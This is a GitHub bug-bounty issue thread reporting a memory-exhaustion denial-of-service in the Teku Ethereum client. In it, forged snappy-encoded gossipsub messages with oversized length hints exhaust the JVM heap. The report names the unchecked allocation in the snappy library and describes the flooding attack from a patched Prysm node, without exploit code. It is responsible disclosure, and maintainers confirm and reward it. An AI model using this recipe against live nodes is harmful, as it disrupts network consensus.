Closed tintinweb closed 4 years ago
teku quickly gets out of sync. mem consumption goes up. eventually dumps at around minute 9 allowing it to re-sync for a bit.
Note Click here or on the image to start the video
Interesting enough when I try this now teku doesn't seem to recover anymore 🤔 (3 seconds of flooding)
Thank you for the detailed report! We'll review it, and ask the Teku team for feedback, but that all may take some time. Sometime next week we'll get back to you. Thanks :+1:
Reproduced on Teku: https://github.com/PegaSysEng/teku/issues/2730 Thanks! 👍
Sorry for the delay. Thank you @tintinweb! This qualifies for the $5k reward tier.
Can you reach out to me at eth2bounty@ethereum.org to get payment setup?
Also, note that this program is recently be deprecated in favor of the eth2bounty program. It should encompass any of the issues you might have found here and more. Current rewards are up to $50k! Happy bug hunting
Note:
I actually had to run this on medalla restricting the attacker to my local network as I wasn't able to sync with the attacknet even after trying multiple days.Note:
Would be great to have a step-by-step guide (besides the readmes and config files) on how to set up the node to sync with the attacknet.Description
Teku nodes are vulnerable to a resource exhaustion attack caused by allocating a buffer from an unchecked attacker-controlled length field causing a DoS condition that prevents them from participating in consensus.
Attack scenario
A malicious node may forge invalid snappy encoded gossipsub messages that cause Teku to allocate an arbitrary amount of memory, eventually causing a JVM out-of-memory condition. Teku can be kept busy processing the malicious gossipsub messages causing numerous stack traces and large short-lived allocations. The JVM can trivially be forced to raise an out of memory condition causing it to dump the heap memory to disk once (per PID).
Impact
/eth2/e7a75d5a/beacon_block
gossip messages and fall behind catching up blocks (see log below)Note
It's probably enough to just keep the node busy with unidirectional gossipsub messagesDetails
Proof Details
Node is syncing:
Node falls behind:
Full Console log:
Teku log:
heap dump files:
Hinting a decompressed length of ~2GB
0x7fffffff
forces the JVM to dump the heap.900 MB heapdump
PoC
Note:
For simplicity, I ran the PoC and target node on the same systemSetup
Target (teku)
codebase: teku master@8167a9d42aaf2a05e127fba946ed8de1d8fe823e
Attacker (prysm)
codebase: prysm
I've patched prysm to perform the attack while syncing. We're hinting a snappy encoded payload length of
0x<random-0-f>fffffff
eventually causing an out of memory condition or just short-lived large allocations. Additionally, the attacker is sending the payload 10000000 times each sync loop. This should keep the peer pretty busy.Note: In my tests it was enough to jus run the poc for a couple of seconds until mem consumption was close to max to cause teku fall behind not receiving blocks for multiple epochs. It is therefore assumed that the attacker does not have to flood the target continuously (the 10000000 is probably an overkill :D).
I will provide a fully working diff on request if someone wants to reproduce.
loop:
Root Cause
Snappy Uncompress calls
xerial.Snappy.uncompress
Snappy.uncompress(received_data)
https://github.com/PegaSysEng/teku/blob/f7daad76ffa8d13f6117516acd7a46bc143df394/networking/eth2/src/main/java/tech/pegasys/teku/networking/eth2/gossip/encoding/SnappyBlockCompressor.java#L28
Xerial snappy uncompress allocs hinted length without sanity checking
byte[] result = new byte[Snappy.uncompressedLength(input)];
https://github.com/xerial/snappy-java/blob/eb341bf08fbc56fa52f646d75ce902d0486dbb8b/src/main/java/org/xerial/snappy/Snappy.java#L491